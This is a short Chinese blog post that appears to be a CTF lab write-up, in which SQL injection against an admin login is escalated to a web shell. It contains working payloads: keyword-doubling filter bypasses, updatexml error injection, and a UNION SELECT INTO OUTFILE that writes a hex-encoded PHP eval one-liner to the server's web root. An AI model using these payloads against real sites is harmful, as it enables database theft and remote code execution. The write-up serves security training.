原理:利用了数据库是能够写文件的。
语法:Select '文件的内容' into outfile '文件的路径'
select 'ctsz1' into outfile 'c:/WWW/ctsz1.txt'
靶场sql-注入绕过防护getshell
输入admin发现有管理员后台
正常输入显示密码不正确
后面加个单引号报错了
使用order by 探测字段长度,最终探测长度为5
order by 5
order by 6
爆数据库名时and被过滤,采用空格+双写绕过:
admin' an and d updatexml(1,concat(0x7e,select database(),0x7e),1)#
然后注入码
admin' uni union on selselectect null,null,null,null,0x3c3f706870206576616c28245f524551554553545b385d293f3e in into outoutfilefile 'D:/phpStudy/WWW/bees/ctsz1.php'--+
一句话木马:<?php eval($_REQUEST[8])?> --> 16编码(HEX转换)转换:0x3c3f706870206576616c28245f524551554553545b385d293f3e
然后用菜刀进行连接
发现flag 提交
标签:admin,into,ctsz1,sql,null,order,注入 From: https://www.cnblogs.com/Ctsz1/p/17009594.html